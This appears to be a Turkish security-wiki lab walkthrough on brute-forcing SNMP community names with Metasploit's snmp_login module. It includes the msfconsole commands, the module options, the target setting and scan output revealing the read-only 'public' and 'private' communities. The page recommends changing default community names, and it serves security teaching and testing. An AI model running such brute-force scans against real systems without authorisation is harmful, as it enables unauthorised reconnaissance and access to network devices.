SNMP Community Name Brute Force Denemeleri

BGA Security Wiki sitesinden
Şuraya atla: kullan, ara

Amaç:

SNMP protokolünden bilgi almak için community name’in kaba kuvvet yöntemi ile tespit edilmesi.

Araç:

 • metasploit(snmp_login)

Lab Senaryosu:

SNMP “community name” bilgisinin elde edilmesi ile hedef sistem hakkında bilgi alınması mümkündür. Bu yüzden sistemlerin SNMP “community name” değerlerinin ön tanımlı olarak bırakılmaması önerilmektedir.

Adımlar:

1. Adım: Metasploit Framework başlatılır;

root@bt:~/Desktop# msfconsole
msf >

2. Adım: İlgili modül seçilir;

use auxiliary/scanner/snmp/snmp_login

3. Adım: Modülün alabileceği parametreler gözlenir;

show options

Module options (auxiliary/scanner/snmp/snmp_login):

 Name     	Current Setting      Required Description
 ----     	---------------       -------- -----------
 BATCHSIZE   	256              yes  	The number of hosts to probe in each set
 BLANK_PASSWORDS   false            no  	Try blank passwords for all users
 BRUTEFORCE_SPEED  5               yes  	How fast to bruteforce, from 0 to 5
 CHOST                          no  	The local client address
 DB_ALL_CREDS 	false             no  	Try each user/password couple stored in the current database
 DB_ALL_PASS  	false             no  	Add all passwords in the current database to the list
 DB_ALL_USERS 	false              no  	Add all users in the current database to the list
 PASSWORD                      no  	The password to test
 PASS_FILE  /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt no    File containing communities, one per line
 RHOSTS                         yes  	The target address range or CIDR identifier
 RPORT     	161                   yes  	The target port
 STOP_ON_SUCCESS  false          yes  	Stop guessing when a credential works for a host
 THREADS    	1                  yes  	The number of concurrent threads
 USER_AS_PASS 	false              no  	Try the username as the password for all users
 VERBOSE    	true              yes  	Whether to print output for all attempts

4. Adım: Hedef sistem bilgileri girilerek sisteme SNMP sorguları gönderilir. Sadece RHOST değerinin girilmesi yeterli olacaktır.

msf auxiliary(snmp_login) > set RHOSTS 1.1.1.100
RHOSTS => 1.1.1.100

5. Adım: Zafiyet testinin gerçekleştirilmesi;

msf auxiliary(snmp_login) > exploit

[+] 1.1.1.100:161 - LOGIN SUCCESSFUL: public: (Access level: read-only)
[+] 1.1.1.100:161 - LOGIN SUCCESSFUL: private: (Access level: read-only)
[-] :161SNMP - 1.1.1.100:161 - LOGIN FAILED: 0: (Incorrect: )
[-] :161SNMP - 1.1.1.100:161 - LOGIN FAILED: 0392a0: (Incorrect: )
[-] :161SNMP - 1.1.1.100:161 - LOGIN FAILED: 1234: (Incorrect: )
[-] :161SNMP - 1.1.1.100:161 - LOGIN FAILED: 2read: (Incorrect: )
[-] :161SNMP - 1.1.1.100:161 - LOGIN FAILED: 4changes: (Incorrect: )
[-] :161SNMP - 1.1.1.100:161 - LOGIN FAILED: ANYCOM: (Incorrect: )
[-] :161SNMP - 1.1.1.100:161 - LOGIN FAILED: Admin: (Incorrect: )
[-] :161SNMP - 1.1.1.100:161 - LOGIN FAILED: C0de: (Incorrect: )
[-] :161SNMP - 1.1.1.100:161 - LOGIN FAILED: CISCO: (Incorrect: )
[-] :161SNMP - 1.1.1.100:161 - LOGIN FAILED: CR52401: (Incorrect: )
[-] :161SNMP - 1.1.1.100:161 - LOGIN FAILED: IBM: (Incorrect: )
^C[*] Caught interrupt from the console...
[*] Auxiliary module execution completed

Elde edilen çıktılardan sadece bir kısmı verilmiştir, görüldüğü üzere hedef sistem üzerinde var olan “community name” değerleri “LOGIN SUCCESSFUL” ibaresi ile gösterilmiştir ve yine çıktıdan anlaşılacağı üzere sistem üzerinde bu değerler ile yazma hakları bulunmamaktadır.